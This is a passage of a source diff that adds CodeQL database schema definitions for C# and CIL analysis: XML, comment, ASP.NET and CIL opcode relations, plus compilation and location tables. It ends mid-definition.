+ +@xmlparent = @file | @xmlelement; +@xmlnamespaceable = @xmlelement | @xmlattribute; + +xmllocations( + int xmlElement: @xmllocatable ref, + int location: @location_default ref); + +@xmllocatable = @xmlcharacters | @xmlelement | @xmlcomment | @xmlattribute | @xmldtd | @file | @xmlnamespace; + +/* Comments */ + +commentline( + unique int id: @commentline, + int kind: int ref, + string text: string ref, + string rawtext: string ref); + +case @commentline.kind of + 0 = @singlelinecomment +| 1 = @xmldoccomment +| 2 = @multilinecomment; + +commentline_location( + unique int id: @commentline ref, + int loc: @location ref); + +commentblock( + unique int id : @commentblock); + +commentblock_location( + unique int id: @commentblock ref, + int loc: @location ref); + +commentblock_binding( + int id: @commentblock ref, + int entity: @element ref, + int bindtype: int ref); /* 0: Parent, 1: Best, 2: Before, 3: After */ + +commentblock_child( + int id: @commentblock ref, + int commentline: @commentline ref, + int index: int ref); + +/* ASP.NET */ + +case @asp_element.kind of + 0=@asp_close_tag +| 1=@asp_code +| 2=@asp_comment +| 3=@asp_data_binding +| 4=@asp_directive +| 5=@asp_open_tag +| 6=@asp_quoted_string +| 7=@asp_text +| 8=@asp_xml_directive; + +@asp_attribute = @asp_code | @asp_data_binding | @asp_quoted_string; + +asp_elements( + unique int id: @asp_element, + int kind: int ref, + int loc: @location ref); + +asp_comment_server(unique int comment: @asp_comment ref); +asp_code_inline(unique int code: @asp_code ref); +asp_directive_attribute( + int directive: @asp_directive ref, + int index: int ref, + string name: string ref, + int value: @asp_quoted_string ref); +asp_directive_name( + unique int directive: @asp_directive ref, + string name: string ref); +asp_element_body( + unique int element: @asp_element ref, + string body: string ref); +asp_tag_attribute( + int tag: @asp_open_tag ref, + int index: int ref, + string name: string ref, + int attribute: @asp_attribute ref); +asp_tag_name( + unique int tag: @asp_open_tag ref, + string name: string ref); +asp_tag_isempty(int tag: @asp_open_tag ref); + +/* Common Intermediate Language - CIL */ + +case @cil_instruction.opcode of + 0 = @cil_nop +| 1 = @cil_break +| 2 = @cil_ldarg_0 +| 3 = @cil_ldarg_1 +| 4 = @cil_ldarg_2 +| 5 = @cil_ldarg_3 +| 6 = @cil_ldloc_0 +| 7 = @cil_ldloc_1 +| 8 = @cil_ldloc_2 +| 9 = @cil_ldloc_3 +| 10 = @cil_stloc_0 +| 11 = @cil_stloc_1 +| 12 = @cil_stloc_2 +| 13 = @cil_stloc_3 +| 14 = @cil_ldarg_s +| 15 = @cil_ldarga_s +| 16 = @cil_starg_s +| 17 = @cil_ldloc_s +| 18 = @cil_ldloca_s +| 19 = @cil_stloc_s +| 20 = @cil_ldnull +| 21 = @cil_ldc_i4_m1 +| 22 = @cil_ldc_i4_0 +| 23 = @cil_ldc_i4_1 +| 24 = @cil_ldc_i4_2 +| 25 = @cil_ldc_i4_3 +| 26 = @cil_ldc_i4_4 +| 27 = @cil_ldc_i4_5 +| 28 = @cil_ldc_i4_6 +| 29 = @cil_ldc_i4_7 +| 30 = @cil_ldc_i4_8 +| 31 = @cil_ldc_i4_s +| 32 = @cil_ldc_i4 +| 33 = @cil_ldc_i8 +| 34 = @cil_ldc_r4 +| 35 = @cil_ldc_r8 +| 37 = @cil_dup +| 38 = @cil_pop +| 39 = @cil_jmp +| 40 = @cil_call +| 41 = @cil_calli +| 42 = @cil_ret +| 43 = @cil_br_s +| 44 = @cil_brfalse_s +| 45 = @cil_brtrue_s +| 46 = @cil_beq_s +| 47 = @cil_bge_s +| 48 = @cil_bgt_s +| 49 = @cil_ble_s +| 50 = @cil_blt_s +| 51 = @cil_bne_un_s +| 52 = @cil_bge_un_s +| 53 = @cil_bgt_un_s +| 54 = @cil_ble_un_s +| 55 = @cil_blt_un_s +| 56 = @cil_br +| 57 = @cil_brfalse +| 58 = @cil_brtrue +| 59 = @cil_beq +| 60 = @cil_bge +| 61 = @cil_bgt +| 62 = @cil_ble +| 63 = @cil_blt +| 64 = @cil_bne_un +| 65 = @cil_bge_un +| 66 = @cil_bgt_un +| 67 = @cil_ble_un +| 68 = @cil_blt_un +| 69 = @cil_switch +| 70 = @cil_ldind_i1 +| 71 = @cil_ldind_u1 +| 72 = @cil_ldind_i2 +| 73 = @cil_ldind_u2 +| 74 = @cil_ldind_i4 +| 75 = @cil_ldind_u4 +| 76 = @cil_ldind_i8 +| 77 = @cil_ldind_i +| 78 = @cil_ldind_r4 +| 79 = @cil_ldind_r8 +| 80 = @cil_ldind_ref +| 81 = @cil_stind_ref +| 82 = @cil_stind_i1 +| 83 = @cil_stind_i2 +| 84 = @cil_stind_i4 +| 85 = @cil_stind_i8 +| 86 = @cil_stind_r4 +| 87 = @cil_stind_r8 +| 88 = @cil_add +| 89 = @cil_sub +| 90 = @cil_mul +| 91 = @cil_div +| 92 = @cil_div_un +| 93 = @cil_rem +| 94 = @cil_rem_un +| 95 = @cil_and +| 96 = @cil_or +| 97 = @cil_xor +| 98 = @cil_shl +| 99 = @cil_shr +| 100 = @cil_shr_un +| 101 = @cil_neg +| 102 = @cil_not +| 103 = @cil_conv_i1 +| 104 = @cil_conv_i2 +| 105 = @cil_conv_i4 +| 106 = @cil_conv_i8 +| 107 = @cil_conv_r4 +| 108 = @cil_conv_r8 +| 109 = @cil_conv_u4 +| 110 = @cil_conv_u8 +| 111 = @cil_callvirt +| 112 = @cil_cpobj +| 113 = @cil_ldobj +| 114 = @cil_ldstr +| 115 = @cil_newobj +| 116 = @cil_castclass +| 117 = @cil_isinst +| 118 = @cil_conv_r_un +| 121 = @cil_unbox +| 122 = @cil_throw +| 123 = @cil_ldfld +| 124 = @cil_ldflda +| 125 = @cil_stfld +| 126 = @cil_ldsfld +| 127 = @cil_ldsflda +| 128 = @cil_stsfld +| 129 = @cil_stobj +| 130 = @cil_conv_ovf_i1_un +| 131 = @cil_conv_ovf_i2_un +| 132 = @cil_conv_ovf_i4_un +| 133 = @cil_conv_ovf_i8_un +| 134 = @cil_conv_ovf_u1_un +| 135 = @cil_conv_ovf_u2_un +| 136 = @cil_conv_ovf_u4_un +| 137 = @cil_conv_ovf_u8_un +| 138 = @cil_conv_ovf_i_un +| 139 = @cil_conv_ovf_u_un +| 140 = @cil_box +| 141 = @cil_newarr +| 142 = @cil_ldlen +| 143 = @cil_ldelema +| 144 = @cil_ldelem_i1 +| 145 = @cil_ldelem_u1 +| 146 = @cil_ldelem_i2 +| 147 = @cil_ldelem_u2 +| 148 = @cil_ldelem_i4 +| 149 = @cil_ldelem_u4 +| 150 = @cil_ldelem_i8 +| 151 = @cil_ldelem_i +| 152 = @cil_ldelem_r4 +| 153 = @cil_ldelem_r8 +| 154 = @cil_ldelem_ref +| 155 = @cil_stelem_i +| 156 = @cil_stelem_i1 +| 157 = @cil_stelem_i2 +| 158 = @cil_stelem_i4 +| 159 = @cil_stelem_i8 +| 160 = @cil_stelem_r4 +| 161 = @cil_stelem_r8 +| 162 = @cil_stelem_ref +| 163 = @cil_ldelem +| 164 = @cil_stelem +| 165 = @cil_unbox_any +| 179 = @cil_conv_ovf_i1 +| 180 = @cil_conv_ovf_u1 +| 181 = @cil_conv_ovf_i2 +| 182 = @cil_conv_ovf_u2 +| 183 = @cil_conv_ovf_i4 +| 184 = @cil_conv_ovf_u4 +| 185 = @cil_conv_ovf_i8 +| 186 = @cil_conv_ovf_u8 +| 194 = @cil_refanyval +| 195 = @cil_ckinfinite +| 198 = @cil_mkrefany +| 208 = @cil_ldtoken +| 209 = @cil_conv_u2 +| 210 = @cil_conv_u1 +| 211 = @cil_conv_i +| 212 = @cil_conv_ovf_i +| 213 = @cil_conv_ovf_u +| 214 = @cil_add_ovf +| 215 = @cil_add_ovf_un +| 216 = @cil_mul_ovf +| 217 = @cil_mul_ovf_un +| 218 = @cil_sub_ovf +| 219 = @cil_sub_ovf_un +| 220 = @cil_endfinally +| 221 = @cil_leave +| 222 = @cil_leave_s +| 223 = @cil_stind_i +| 224 = @cil_conv_u +| 65024 = @cil_arglist +| 65025 = @cil_ceq +| 65026 = @cil_cgt +| 65027 = @cil_cgt_un +| 65028 = @cil_clt +| 65029 = @cil_clt_un +| 65030 = @cil_ldftn +| 65031 = @cil_ldvirtftn +| 65033 = @cil_ldarg +| 65034 = @cil_ldarga +| 65035 = @cil_starg +| 65036 = @cil_ldloc +| 65037 = @cil_ldloca +| 65038 = @cil_stloc +| 65039 = @cil_localloc +| 65041 = @cil_endfilter +| 65042 = @cil_unaligned +| 65043 = @cil_volatile +| 65044 = @cil_tail +| 65045 = @cil_initobj +| 65046 = @cil_constrained +| 65047 = @cil_cpblk +| 65048 = @cil_initblk +| 65050 = @cil_rethrow +| 65052 = @cil_sizeof +| 65053 = @cil_refanytype +| 65054 = @cil_readonly +; + +// CIL ignored instructions + +@cil_ignore = @cil_nop | @cil_break | @cil_volatile | @cil_unaligned; + +// CIL local/parameter/field access + +@cil_ldarg_any = @cil_ldarg_0 | @cil_ldarg_1 | @cil_ldarg_2 | @cil_ldarg_3 | @cil_ldarg_s | @cil_ldarga_s | @cil_ldarg | @cil_ldarga; +@cil_starg_any = @cil_starg | @cil_starg_s; + +@cil_ldloc_any = @cil_ldloc_0 | @cil_ldloc_1 | @cil_ldloc_2 | @cil_ldloc_3 | @cil_ldloc_s | @cil_ldloca_s | @cil_ldloc | @cil_ldloca; +@cil_stloc_any = @cil_stloc_0 | @cil_stloc_1 | @cil_stloc_2 | @cil_stloc_3 | @cil_stloc_s | @cil_stloc; + +@cil_ldfld_any = @cil_ldfld | @cil_ldsfld | @cil_ldsflda | @cil_ldflda; +@cil_stfld_any = @cil_stfld | @cil_stsfld; + +@cil_local_access = @cil_stloc_any | @cil_ldloc_any; +@cil_arg_access = @cil_starg_any | @cil_ldarg_any; +@cil_read_access = @cil_ldloc_any | @cil_ldarg_any | @cil_ldfld_any; +@cil_write_access = @cil_stloc_any | @cil_starg_any | @cil_stfld_any; + +@cil_stack_access = @cil_local_access | @cil_arg_access; +@cil_field_access = @cil_ldfld_any | @cil_stfld_any; + +@cil_access = @cil_read_access | @cil_write_access; + +// CIL constant/literal instructions + +@cil_ldc_i = @cil_ldc_i4_any | @cil_ldc_i8; + +@cil_ldc_i4_any = @cil_ldc_i4_m1 | @cil_ldc_i4_0 | @cil_ldc_i4_1 | @cil_ldc_i4_2 | @cil_ldc_i4_3 | + @cil_ldc_i4_4 | @cil_ldc_i4_5 | @cil_ldc_i4_6 | @cil_ldc_i4_7 | @cil_ldc_i4_8 | @cil_ldc_i4_s | @cil_ldc_i4; + +@cil_ldc_r = @cil_ldc_r4 | @cil_ldc_r8; + +@cil_literal = @cil_ldnull | @cil_ldc_i | @cil_ldc_r | @cil_ldstr; + +// Control flow + +@cil_conditional_jump = @cil_binary_jump | @cil_unary_jump; +@cil_binary_jump = @cil_beq_s | @cil_bge_s | @cil_bgt_s | @cil_ble_s | @cil_blt_s | + @cil_bne_un_s | @cil_bge_un_s | @cil_bgt_un_s | @cil_ble_un_s | @cil_blt_un_s | + @cil_beq | @cil_bge | @cil_bgt | @cil_ble | @cil_blt | + @cil_bne_un | @cil_bge_un | @cil_bgt_un | @cil_ble_un | @cil_blt_un; +@cil_unary_jump = @cil_brfalse_s | @cil_brtrue_s | @cil_brfalse | @cil_brtrue | @cil_switch; +@cil_unconditional_jump = @cil_br | @cil_br_s | @cil_leave_any; +@cil_leave_any = @cil_leave | @cil_leave_s; +@cil_jump = @cil_unconditional_jump | @cil_conditional_jump; + +// CIL call instructions + +@cil_call_any = @cil_jmp | @cil_call | @cil_calli | @cil_tail | @cil_callvirt | @cil_newobj; + +// CIL expression instructions + +@cil_expr = @cil_literal | @cil_binary_expr | @cil_unary_expr | @cil_call_any | @cil_read_access | + @cil_newarr | @cil_ldtoken | @cil_sizeof | + @cil_ldftn | @cil_ldvirtftn | @cil_localloc | @cil_mkrefany | @cil_refanytype | @cil_arglist | @cil_dup; + +@cil_unary_expr = + @cil_conversion_operation | @cil_unary_arithmetic_operation | @cil_unary_bitwise_operation| + @cil_ldlen | @cil_isinst | @cil_box | @cil_ldobj | @cil_castclass | @cil_unbox_any | + @cil_ldind | @cil_unbox; + +@cil_conversion_operation = + @cil_conv_i1 | @cil_conv_i2 | @cil_conv_i4 | @cil_conv_i8 | + @cil_conv_u1 | @cil_conv_u2 | @cil_conv_u4 | @cil_conv_u8 | + @cil_conv_ovf_i | @cil_conv_ovf_i_un | @cil_conv_ovf_i1 | @cil_conv_ovf_i1_un | + @cil_conv_ovf_i2 | @cil_conv_ovf_i2_un | @cil_conv_ovf_i4 | @cil_conv_ovf_i4_un | + @cil_conv_ovf_i8 | @cil_conv_ovf_i8_un | @cil_conv_ovf_u | @cil_conv_ovf_u_un | + @cil_conv_ovf_u1 | @cil_conv_ovf_u1_un | @cil_conv_ovf_u2 | @cil_conv_ovf_u2_un | + @cil_conv_ovf_u4 | @cil_conv_ovf_u4_un | @cil_conv_ovf_u8 | @cil_conv_ovf_u8_un | + @cil_conv_r4 | @cil_conv_r8 | @cil_conv_ovf_u2 | @cil_conv_ovf_u2_un | + @cil_conv_i | @cil_conv_u | @cil_conv_r_un; + +@cil_ldind = @cil_ldind_i | @cil_ldind_i1 | @cil_ldind_i2 | @cil_ldind_i4 | @cil_ldind_i8 | + @cil_ldind_r4 | @cil_ldind_r8 | @cil_ldind_ref | @cil_ldind_u1 | @cil_ldind_u2 | @cil_ldind_u4; + +@cil_stind = @cil_stind_i | @cil_stind_i1 | @cil_stind_i2 | @cil_stind_i4 | @cil_stind_i8 | + @cil_stind_r4 | @cil_stind_r8 | @cil_stind_ref; + +@cil_bitwise_operation = @cil_binary_bitwise_operation | @cil_unary_bitwise_operation; + +@cil_binary_bitwise_operation = @cil_and | @cil_or | @cil_xor | @cil_shr | @cil_shr | @cil_shr_un | @cil_shl; + +@cil_binary_arithmetic_operation = @cil_add | @cil_sub | @cil_mul | @cil_div | @cil_div_un | + @cil_rem | @cil_rem_un | @cil_add_ovf | @cil_add_ovf_un | @cil_mul_ovf | @cil_mul_ovf_un | + @cil_sub_ovf | @cil_sub_ovf_un; + +@cil_unary_bitwise_operation = @cil_not; + +@cil_binary_expr = @cil_binary_arithmetic_operation | @cil_binary_bitwise_operation | @cil_read_array | @cil_comparison_operation; + +@cil_unary_arithmetic_operation = @cil_neg; + +@cil_comparison_operation = @cil_cgt_un | @cil_ceq | @cil_cgt | @cil_clt | @cil_clt_un; + +// Elements that retrieve an address of something +@cil_read_ref = @cil_ldloca_s | @cil_ldarga_s | @cil_ldflda | @cil_ldsflda | @cil_ldelema; + +// CIL array instructions + +@cil_read_array = + @cil_ldelem | @cil_ldelema | @cil_ldelem_i1 | @cil_ldelem_ref | @cil_ldelem_i | + @cil_ldelem_i1 | @cil_ldelem_i2 | @cil_ldelem_i4 | @cil_ldelem_i8 | @cil_ldelem_r4 | + @cil_ldelem_r8 | @cil_ldelem_u1 | @cil_ldelem_u2 | @cil_ldelem_u4; + +@cil_write_array = @cil_stelem | @cil_stelem_ref | + @cil_stelem_i | @cil_stelem_i1 | @cil_stelem_i2 | @cil_stelem_i4 | @cil_stelem_i8 | + @cil_stelem_r4 | @cil_stelem_r8; + +@cil_throw_any = @cil_throw | @cil_rethrow; + +#keyset[impl, index] +cil_instruction( + unique int id: @cil_instruction, + int opcode: int ref, + int index: int ref, + int impl: @cil_method_implementation ref); + +cil_jump( + unique int instruction: @cil_jump ref, + int target: @cil_instruction ref); + +cil_access( + unique int instruction: @cil_instruction ref, + int target: @cil_accessible ref); + +cil_value( + unique int instruction: @cil_literal ref, + string value: string ref); + +#keyset[instruction, index] +cil_switch( + int instruction: @cil_switch ref, + int index: int ref, + int target: @cil_instruction ref); + +cil_instruction_location( + unique int id: @cil_instruction ref, + int loc: @location ref); + +cil_type_location( + int id: @cil_type ref, + int loc: @location ref); + +cil_method_location( + int id: @cil_method ref, + int loc: @location ref); + +@cil_namespace = @namespace; + +@cil_type_container = @cil_type | @cil_namespace | @cil_method; + +case @cil_type.kind of + 0 = @cil_valueorreftype +| 1 = @cil_typeparameter +| 2 = @cil_array_type +| 3 = @cil_pointer_type +| 4 = @cil_function_pointer_type +; + +cil_type( + unique int id: @cil_type, + string name: string ref, + int kind: int ref, + int parent: @cil_type_container ref, + int sourceDecl: @cil_type ref); + +cil_pointer_type( + unique int id: @cil_pointer_type ref, + int pointee: @cil_type ref); + +cil_array_type( + unique int id: @cil_array_type ref, + int element_type: @cil_type ref, + int rank: int ref); + +cil_function_pointer_return_type( + unique int id: @cil_function_pointer_type ref, + int return_type: @cil_type ref); + +cil_method( + unique int id: @cil_method, + string name: string ref, + int parent: @cil_type ref, + int return_type: @cil_type ref); + +cil_method_source_declaration( + unique int method: @cil_method ref, + int source: @cil_method ref); + +cil_method_implementation( + unique int id: @cil_method_implementation, + int method: @cil_method ref, + int location: @assembly ref); + +cil_implements( + int id: @cil_method ref, + int decl: @cil_method ref); + +#keyset[parent, name] +cil_field( + unique int id: @cil_field, + int parent: @cil_type ref, + string name: string ref, + int field_type: @cil_type ref); + +@cil_element = @cil_instruction | @cil_declaration | @cil_handler | @cil_attribute | @cil_namespace; +@cil_named_element = @cil_declaration | @cil_namespace; +@cil_declaration = @cil_variable | @cil_method | @cil_type | @cil_member; +@cil_accessible = @cil_declaration; +@cil_variable = @cil_field | @cil_stack_variable; +@cil_stack_variable = @cil_local_variable | @cil_parameter; +@cil_member = @cil_method | @cil_type | @cil_field | @cil_property | @cil_event; +@cil_custom_modifier_receiver = @cil_method | @cil_property | @cil_parameter | @cil_field | @cil_function_pointer_type; +@cil_parameterizable = @cil_method | @cil_function_pointer_type; +@cil_has_type_annotation = @cil_stack_variable | @cil_property | @cil_method | @cil_function_pointer_type; + +#keyset[parameterizable, index] +cil_parameter( + unique int id: @cil_parameter, + int parameterizable: @cil_parameterizable ref, + int index: int ref, + int param_type: @cil_type ref); + +cil_parameter_in(unique int id: @cil_parameter ref); +cil_parameter_out(unique int id: @cil_parameter ref); + +cil_setter(unique int prop: @cil_property ref, + int method: @cil_method ref); + +#keyset[id, modifier] +cil_custom_modifiers( + int id: @cil_custom_modifier_receiver ref, + int modifier: @cil_type ref, + int kind: int ref); // modreq: 1, modopt: 0 + +cil_type_annotation( + int id: @cil_has_type_annotation ref, + int annotation: int ref); + +cil_getter(unique int prop: @cil_property ref, + int method: @cil_method ref); + +cil_adder(unique int event: @cil_event ref, + int method: @cil_method ref); + +cil_remover(unique int event: @cil_event ref, int method: @cil_method ref); + +cil_raiser(unique int event: @cil_event ref, int method: @cil_method ref); + +cil_property( + unique int id: @cil_property, + int parent: @cil_type ref, + string name: string ref, + int property_type: @cil_type ref); + +#keyset[parent, name] +cil_event(unique int id: @cil_event, + int parent: @cil_type ref, + string name: string ref, + int event_type: @cil_type ref); + +#keyset[impl, index] +cil_local_variable( + unique int id: @cil_local_variable, + int impl: @cil_method_implementation ref, + int index: int ref, + int var_type: @cil_type ref); + +cil_function_pointer_calling_conventions( + int id: @cil_function_pointer_type ref, + int kind: int ref); + +// CIL handlers (exception handlers etc). + +case @cil_handler.kind of + 0 = @cil_catch_handler +| 1 = @cil_filter_handler +| 2 = @cil_finally_handler +| 4 = @cil_fault_handler +; + +#keyset[impl, index] +cil_handler( + unique int id: @cil_handler, + int impl: @cil_method_implementation ref, + int index: int ref, + int kind: int ref, + int try_start: @cil_instruction ref, + int try_end: @cil_instruction ref, + int handler_start: @cil_instruction ref); + +cil_handler_filter( + unique int id: @cil_handler ref, + int filter_start: @cil_instruction ref); + +cil_handler_type( + unique int id: @cil_handler ref, + int catch_type: @cil_type ref); + +@cil_controlflow_node = @cil_entry_point | @cil_instruction; + +@cil_entry_point = @cil_method_implementation | @cil_handler; + +@cil_dataflow_node = @cil_instruction | @cil_variable | @cil_method; + +cil_method_stack_size( + unique int method: @cil_method_implementation ref, + int size: int ref); + +// CIL modifiers + +cil_public(int id: @cil_member ref); +cil_private(int id: @cil_member ref); +cil_protected(int id: @cil_member ref); +cil_internal(int id: @cil_member ref); +cil_static(int id: @cil_member ref); +cil_sealed(int id: @cil_member ref); +cil_virtual(int id: @cil_method ref); +cil_abstract(int id: @cil_member ref); +cil_class(int id: @cil_type ref); +cil_interface(int id: @cil_type ref); +cil_security(int id: @cil_member ref); +cil_requiresecobject(int id: @cil_method ref); +cil_specialname(int id: @cil_method ref); +cil_newslot(int id: @cil_method ref); + +cil_base_class(unique int id: @cil_type ref, int base: @cil_type ref); +cil_base_interface(int id: @cil_type ref, int base: @cil_type ref); +cil_enum_underlying_type(unique int id: @cil_type ref, int underlying: @cil_type ref); + +#keyset[unbound, index] +cil_type_parameter( + int unbound: @cil_member ref, + int index: int ref, + int param: @cil_typeparameter ref); + +#keyset[bound, index] +cil_type_argument( + int bound: @cil_member ref, + int index: int ref, + int t: @cil_type ref); + +// CIL type parameter constraints + +cil_typeparam_covariant(int tp: @cil_typeparameter ref); +cil_typeparam_contravariant(int tp: @cil_typeparameter ref); +cil_typeparam_class(int tp: @cil_typeparameter ref); +cil_typeparam_struct(int tp: @cil_typeparameter ref); +cil_typeparam_new(int tp: @cil_typeparameter ref); +cil_typeparam_constraint(int tp: @cil_typeparameter ref, int supertype: @cil_type ref); + +// CIL attributes + +cil_attribute( + unique int attributeid: @cil_attribute, + int element: @cil_declaration ref, + int constructor: @cil_method ref); + +#keyset[attribute_id, param] +cil_attribute_named_argument( + int attribute_id: @cil_attribute ref, + string param: string ref, + string value: string ref); + +#keyset[attribute_id, index] +cil_attribute_positional_argument( + int attribute_id: @cil_attribute ref, + int index: int ref, + string value: string ref); + + +// Common .Net data model covering both C# and CIL + +// Common elements +@dotnet_element = @element | @cil_element; +@dotnet_named_element = @named_element | @cil_named_element; +@dotnet_callable = @callable | @cil_method; +@dotnet_variable = @variable | @cil_variable; +@dotnet_field = @field | @cil_field; +@dotnet_parameter = @parameter | @cil_parameter; +@dotnet_declaration = @declaration | @cil_declaration; +@dotnet_member = @member | @cil_member; +@dotnet_event = @event | @cil_event; +@dotnet_property = @property | @cil_property | @indexer; +@dotnet_parameterizable = @parameterizable | @cil_parameterizable; + +// Common types +@dotnet_type = @type | @cil_type; +@dotnet_call = @call | @cil_call_any; +@dotnet_throw = @throw_element | @cil_throw_any; +@dotnet_valueorreftype = @cil_valueorreftype | @value_or_ref_type | @cil_array_type | @void_type; +@dotnet_typeparameter = @type_parameter | @cil_typeparameter; +@dotnet_array_type = @array_type | @cil_array_type; +@dotnet_pointer_type = @pointer_type | @cil_pointer_type; +@dotnet_type_parameter = @type_parameter | @cil_typeparameter; +@dotnet_generic = @dotnet_valueorreftype | @dotnet_callable; + +// Attributes +@dotnet_attribute = @attribute | @cil_attribute; + +// Expressions +@dotnet_expr = @expr | @cil_expr; + +// Literals +@dotnet_literal = @literal_expr | @cil_literal; +@dotnet_string_literal = @string_literal_expr | @cil_ldstr; +@dotnet_int_literal = @integer_literal_expr | @cil_ldc_i; +@dotnet_float_literal = @float_literal_expr | @cil_ldc_r; +@dotnet_null_literal = @null_literal_expr | @cil_ldnull; + +@metadata_entity = @cil_method | @cil_type | @cil_field | @cil_property | @field | @property | + @callable | @value_or_ref_type | @void_type; + +#keyset[entity, location] +metadata_handle(int entity : @metadata_entity ref, int location: @assembly ref, int handle: int ref) diff --git a/csharp/downgrades/d0fba103f7dee477dd7d9f6c038518b3f683b2c7/semmlecode.csharp.dbscheme b/csharp/downgrades/d0fba103f7dee477dd7d9f6c038518b3f683b2c7/semmlecode.csharp.dbscheme new file mode 100644 index 00000000000..83aca6b3e4f --- /dev/null +++ b/csharp/downgrades/d0fba103f7dee477dd7d9f6c038518b3f683b2c7/semmlecode.csharp.dbscheme @@ -0,0 +1,2067 @@ +/* This is a dummy line to alter the dbscheme, so we can make a database upgrade + * without actually changing any of the dbscheme predicates. It contains a date + * to allow for such updates in the future as well. + * + * 2021-07-14 + * + * DO NOT remove this comment carelessly, since it can revert the dbscheme back to a + * previously seen state (matching a previously seen SHA), which would make the upgrade + * mechanism not work properly. + */ + +/** + * An invocation of the compiler. Note that more than one file may be + * compiled per invocation. For example, this command compiles three + * source files: + * + * csc f1.cs f2.cs f3.cs + * + * The `id` simply identifies the invocation, while `cwd` is the working + * directory from which the compiler was invoked. + */ +compilations( + unique int id : @compilation, + string cwd : string ref +); + +/** + * The arguments that were passed to the extractor for a compiler + * invocation. If `id` is for the compiler invocation + * + * csc f1.cs f2.cs f3.cs + * + * then typically there will be rows for + * + * num | arg + * --- | --- + * 0 | --compiler + * 1 | *path to compiler* + * 2 | f1.cs + * 3 | f2.cs + * 4 | f3.cs + */ +#keyset[id, num] +compilation_args( + int id : @compilation ref, + int num : int ref, + string arg : string ref +); + +/** + * The source files that are compiled by a compiler invocation. + * If `id` is for the compiler invocation + * + * csc f1.cs f2.cs f3.cs + * + * then there will be rows for + * + * num | arg + * --- | --- + * 0 | f1.cs + * 1 | f2.cs + * 2 | f3.cs + */ +#keyset[id, num] +compilation_compiling_files( + int id : @compilation ref, + int num : int ref, + int file : @file ref +); + +/** + * The references used by a compiler invocation. + * If `id` is for the compiler invocation + * + * csc f1.cs f2.cs f3.cs /r:ref1.dll /r:ref2.dll /r:ref3.dll + * + * then there will be rows for + * + * num | arg + * --- | --- + * 0 | ref1.dll + * 1 | ref2.dll + * 2 | ref3.dll + */ +#keyset[id, num] +compilation_referencing_files( + int id : @compilation ref, + int num : int ref, + int file : @file ref +); + +/** + * The time taken by the extractor for a compiler invocation. + * + * For each file `num`, there will be rows for + * + * kind | seconds + * ---- | --- + * 1 | CPU seconds used by the extractor frontend + * 2 | Elapsed seconds during the extractor frontend + * 3 | CPU seconds used by the extractor backend + * 4 | Elapsed seconds during the extractor backend + */ +#keyset[id, num, kind] +compilation_time( + int id : @compilation ref, + int num : int ref, + /* kind: + 1 = frontend_cpu_seconds + 2 = frontend_elapsed_seconds + 3 = extractor_cpu_seconds + 4 = extractor_elapsed_seconds + */ + int kind : int ref, + float seconds : float ref +); + +/** + * An error or warning generated by the extractor. + * The diagnostic message `diagnostic` was generated during compiler + * invocation `compilation`, and is the `file_number_diagnostic_number`th + * message generated while extracting the `file_number`th file of that + * invocation. + */ +#keyset[compilation, file_number, file_number_diagnostic_number] +diagnostic_for( + unique int diagnostic : @diagnostic ref, + int compilation : @compilation ref, + int file_number : int ref, + int file_number_diagnostic_number : int ref +); + +diagnostics( + unique int id: @diagnostic, + int severity: int ref, + string error_tag: string ref, + string error_message: string ref, + string full_error_message: string ref, + int location: @location_default ref +); + +extractor_messages( + unique int id: @extractor_message, + int severity: int ref, + string origin : string ref, + string text : string ref, + string entity : string ref, + int location: @location_default ref, + string stack_trace : string ref +); + +/** + * If extraction was successful, then `cpu_seconds` and + * `elapsed_seconds` are the CPU time and elapsed time (respectively) + * that extraction took for compiler invocation `id`. + */ +compilation_finished( + unique int id : @compilation ref, + float cpu_seconds : float ref, + float elapsed_seconds : float ref +); + +compilation_assembly( + unique int id : @compilation ref, + int assembly: @assembly ref +) + +// Populated by the CSV extractor +externalData( + int id: @externalDataElement, + string path: string ref, + int column: int ref, + string value: string ref); + +sourceLocationPrefix( + string prefix: string ref); + +/* + * C# dbscheme + */ + +/** ELEMENTS **/ + +@element = @declaration | @stmt | @expr | @modifier | @attribute | @namespace_declaration + | @using_directive | @type_parameter_constraints | @externalDataElement + | @xmllocatable | @asp_element | @namespace | @preprocessor_directive; + +@declaration = @callable | @generic | @assignable | @namespace; + +@named_element = @namespace | @declaration; + +@declaration_with_accessors = @property | @indexer | @event; + +@assignable = @variable | @assignable_with_accessors | @event; + +@assignable_with_accessors = @property | @indexer; + +@attributable = @assembly | @field | @parameter | @operator | @method | @constructor + | @destructor | @callable_accessor | @value_or_ref_type | @declaration_with_accessors + | @local_function | @lambda_expr; + +/** LOCATIONS, ASEMMBLIES, MODULES, FILES and FOLDERS **/ + +@location = @location_default | @assembly; + +locations_default( + unique int id: @location_default, + int file: @file ref, + int beginLine: int ref, + int beginColumn: int ref, + int endLine: int ref, + int endColumn: int ref); + +locations_mapped( + unique int id: @location_default ref, + int mapped_to: @location_default ref); + +@sourceline = @file | @callable | @xmllocatable; + +numlines( + int element_id: @sourceline ref, + int num_lines: int ref, + int num_code: int ref, + int num_comment: int ref); + +assemblies( + unique int id: @assembly, + int file: @file ref, + string fullname: string ref, + string name: string ref, + string version: string ref); + +files( + unique int id: @file, + string name: string ref); + +folders( + unique int id: @folder, + string name: string ref); + +@container = @folder | @file ; + +containerparent( + int parent: @container ref, + unique int child: @container ref); + +file_extraction_mode( + unique int file: @file ref, + int mode: int ref + /* 0 = normal, 1 = standalone extractor */ + ); + +/** NAMESPACES **/ + +@type_container = @namespace | @type; + +namespaces( + unique int id: @namespace, + string name: string ref); + +namespace_declarations( + unique int id: @namespace_declaration, + int namespace_id: @namespace ref); + +namespace_declaration_location( + unique int id: @namespace_declaration ref, + int loc: @location ref); + +parent_namespace( + unique int child_id: @type_container ref, + int namespace_id: @namespace ref); + +@declaration_or_directive = @namespace_declaration | @type | @using_directive; + +parent_namespace_declaration( + int child_id: @declaration_or_directive ref, // cannot be unique because of partial classes + int namespace_id: @namespace_declaration ref); + +@using_directive = @using_namespace_directive | @using_static_directive; + +using_global( + unique int id: @using_directive ref +); + +using_namespace_directives( + unique int id: @using_namespace_directive, + int namespace_id: @namespace ref); + +using_static_directives( + unique int id: @using_static_directive, + int type_id: @type_or_ref ref); + +using_directive_location( + unique int id: @using_directive ref, + int loc: @location ref); + +@preprocessor_directive = @pragma_warning | @pragma_checksum | @directive_define | @directive_undefine | @directive_warning + | @directive_error | @directive_nullable | @directive_line | @directive_region | @directive_endregion | @directive_if + | @directive_elif | @directive_else | @directive_endif; + +@conditional_directive = @directive_if | @directive_elif; +@branch_directive = @directive_if | @directive_elif | @directive_else; + +directive_ifs( + unique int id: @directive_if, 